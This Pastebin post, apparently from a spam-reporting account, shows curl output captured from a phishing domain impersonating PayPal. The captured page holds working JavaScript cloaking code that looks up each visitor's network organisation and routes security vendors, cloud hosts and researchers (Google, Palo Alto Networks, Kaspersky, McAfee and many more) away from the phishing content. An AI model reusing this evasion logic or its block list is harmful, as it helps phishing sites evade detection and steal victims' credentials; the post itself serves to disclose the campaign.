spamreports

paypalupdate-secure·net AJAX IP evasion code

Jan 7th, 2020
477
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. 08:37:21@RandomVM-> curl -s -w "%{http_code}"  -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101" https://paypalupdate-secure.net/ -L
  2.  
  3. <script src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.4.0.min.js"></script>
  4. <script>
  5. $.ajax({
  6. type: "GET",url:'https://ipapi.co/org/',
  7. success: function (ec37d94) {
  8. if (
  9. ec37d94.indexOf("LGBT") >= 0
  10. || ec37d94.indexOf("Amazon.com") >= 0
  11. || ec37d94.indexOf("Amazon") >= 0
  12. || ec37d94.indexOf("Chrome") >= 0
  13. || ec37d94.indexOf("Google") >= 0
  14. || ec37d94.indexOf("phish") >= 0
  15. || ec37d94.indexOf("Paypal") >= 0
  16. || ec37d94.indexOf("DedFiberCo") >= 0
  17. || ec37d94.indexOf("Palo Alto Networks") >= 0
  18. || ec37d94.indexOf("Digital Ocean") >= 0
  19. || ec37d94.indexOf("DigitalOcean") >= 0
  20. || ec37d94.indexOf("Google Cloud") >= 0
  21. || ec37d94.indexOf("Cloud") >= 0
  22. || ec37d94.indexOf("107.178.194.44") >= 0
  23. || ec37d94.indexOf("Trustwave Holdings") >= 0
  24. || ec37d94.indexOf("Holdings") >= 0
  25. || ec37d94.indexOf("Trustwave") >= 0
  26. || ec37d94.indexOf("SoftLayer Technologies") >= 0
  27. || ec37d94.indexOf("SoftLayer") >= 0
  28. || ec37d94.indexOf("SurfControl") >= 0
  29. || ec37d94.indexOf("EGIHosting") >= 0
  30. || ec37d94.indexOf("LogicWeb") >= 0
  31. || ec37d94.indexOf("Choopa") >= 0
  32. || ec37d94.indexOf("Shinjiru") >= 0
  33. || ec37d94.indexOf("LogicWeb") >= 0
  34. || ec37d94.indexOf("Total Server Solutions") >= 0
  35. || ec37d94.indexOf("Brookhaven National Laboratory") >= 0
  36. || ec37d94.indexOf("OVH Hosting") >= 0
  37. || ec37d94.indexOf("XFERA Moviles S.A.") >= 0
  38. || ec37d94.indexOf("AVAST") >= 0
  39. || ec37d94.indexOf("Privax Ltd.") >= 0
  40. || ec37d94.indexOf("Privax") >= 0
  41. || ec37d94.indexOf("M247 Europe SRL") >= 0
  42. || ec37d94.indexOf("Wintek Corporation") >= 0
  43. || ec37d94.indexOf("Amazon.com, Inc.") >= 0
  44. || ec37d94.indexOf("Kaspersky Lab AO") >= 0
  45. || ec37d94.indexOf("TELEFÔNICA BRASIL S.A") >= 0
  46. || ec37d94.indexOf("UK-2 Limited") >= 0
  47. || ec37d94.indexOf("Online S.a.s.") >= 0
  48. || ec37d94.indexOf("BullGuard ApS") >= 0
  49. || ec37d94.indexOf("net4sec UG") >= 0
  50. || ec37d94.indexOf("Datacamp Limited") >= 0
  51. || ec37d94.indexOf("HostDime.com, Inc.") >= 0
  52. || ec37d94.indexOf("Digital Energy Technologies Ltd.") >= 0
  53. || ec37d94.indexOf("New Dream Network, LLC") >= 0
  54. || ec37d94.indexOf("LeaseWeb Netherlands B.V.") >= 0
  55. || ec37d94.indexOf("Hetzner Online GmbH") >= 0
  56. || ec37d94.indexOf("Rakuten Communications Corp.") >= 0
  57. || ec37d94.indexOf("Forcepoint Cloud Ltd") >= 0
  58. || ec37d94.indexOf("IP Volume inc") >= 0
  59. || ec37d94.indexOf("NTT PC Communications, Inc.") >= 0
  60. || ec37d94.indexOf("Liberty Global B.V.") >= 0
  61. || ec37d94.indexOf("Google LLC") >= 0
  62. || ec37d94.indexOf("PALO ALTO NETWORKS") >= 0
  63. || ec37d94.indexOf("ColoCrossing") >= 0
  64. || ec37d94.indexOf("Forcepoint, LLC") >= 0
  65. || ec37d94.indexOf("SINET, Cambodia's specialist Internet and Telecom Service Provider.") >= 0
  66. || ec37d94.indexOf("DigitalOcean, LLC") >= 0
  67. || ec37d94.indexOf("Soyuz LTD") >= 0
  68. || ec37d94.indexOf("Internap Corporation") >= 0
  69. || ec37d94.indexOf("Nameshield SAS") >= 0
  70. || ec37d94.indexOf("Microsoft Corporation") >= 0
  71. || ec37d94.indexOf("VNPT Corp") >= 0
  72. || ec37d94.indexOf("PVimpelCom") >= 0
  73. || ec37d94.indexOf("net4sec UG") >= 0
  74. || ec37d94.indexOf("Wintek Corporation") >= 0
  75. || ec37d94.indexOf("EAGLE SKY CO LT") >= 0
  76. || ec37d94.indexOf("SoftLayer Technologies Inc.") >= 0
  77. || ec37d94.indexOf("Leaseweb USA, Inc.") >= 0
  78. || ec37d94.indexOf("HETZNER") >= 0
  79. || ec37d94.indexOf("F5 Networks, Inc.") >= 0
  80. || ec37d94.indexOf("British Telecommunications PLC") >= 0
  81. || ec37d94.indexOf("GigeNET") >= 0
  82. || ec37d94.indexOf("FASTER CZ spol. s r.o.") >= 0
  83. || ec37d94.indexOf("Cogent Communications") >= 0
  84. || ec37d94.indexOf("Renater") >= 0
  85. || ec37d94.indexOf("InterNetX GmbH") >= 0
  86. || ec37d94.indexOf("Forcepoint Cloud Ltd") >= 0
  87. || ec37d94.indexOf("The Corporation for Financing & Promoting Technology") >= 0
  88. || ec37d94.indexOf("PALO ALTO NETWORKS") >= 0
  89. || ec37d94.indexOf("TerraTransit AG") >= 0
  90. || ec37d94.indexOf("Joshua Peter McQuistan") >= 0
  91. || ec37d94.indexOf("Commtouch Inc.") >= 0
  92. || ec37d94.indexOf("YANDEX LLC") >= 0
  93. || ec37d94.indexOf("M247 Ltd") >= 0
  94. || ec37d94.indexOf("RateLimited") >= 0
  95. || ec37d94.indexOf("Hot-Net internet services Ltd.") >= 0
  96. || ec37d94.indexOf("NTT Communications Corporation") >= 0
  97. || ec37d94.indexOf("Hetzner Online GmbH") >= 0
  98. || ec37d94.indexOf("Sungard Availability Network Solutions") >= 0
  99. || ec37d94.indexOf("Network Solutions") >= 0
  100. || ec37d94.indexOf("McAfee") >= 0
  101. || ec37d94.indexOf("Google Proxy") >= 0
  102. || ec37d94.indexOf("Contina Communications, LLC") >= 0
  103. || ec37d94.indexOf("Contina") >= 0
  104. || ec37d94.indexOf("Almouroltec Servicos De Informatica E Internet Lda") >= 0
  105. || ec37d94.indexOf("HL komm Telekommunikations GmbH") >= 0
  106. || ec37d94.indexOf("Symantec Corporation") >= 0
  107. || ec37d94.indexOf("KVCHOSTING.COM LLC") >= 0
  108. || ec37d94.indexOf("Tiscali SpA") >= 0
  109. || ec37d94.indexOf("Vertical Telecoms Pty Ltd") >= 0
  110. || ec37d94.indexOf("1&1 Internet SE") >= 0
  111. || ec37d94.indexOf("AVAST Software s.r.o.") >= 0
  112. || ec37d94.indexOf("Microsoft Corporation") >= 0
  113. || ec37d94.indexOf("Total Server Solutions L.L.C") >= 0
  114. || ec37d94.indexOf("EVANZO e-commerce GmbH") >= 0
  115. || ec37d94.indexOf("TM Net, Internet Service Provider") >= 0
  116. || ec37d94.indexOf("ESET, spol. s r.o.") >= 0
  117. || ec37d94.indexOf("Atlantic.net, Inc.") >= 0
  118. || ec37d94.indexOf("Venus Business Communications Limited") >= 0
  119. || ec37d94.indexOf("OVH SAS") >= 0
  120. ){
  121.  
  122. window.location.href = "inline.php?IeURdOfX1512371736=IeURdOfX1512371736-c37d94";
  123. }else {
  124.  
  125. window.location.href = "inline.php?MLByselK1512371736=MLByselK1512371736-c37d94";
  126. }
  127. }
  128. });
  129. </script>
Add Comment
Please, Sign In to add comment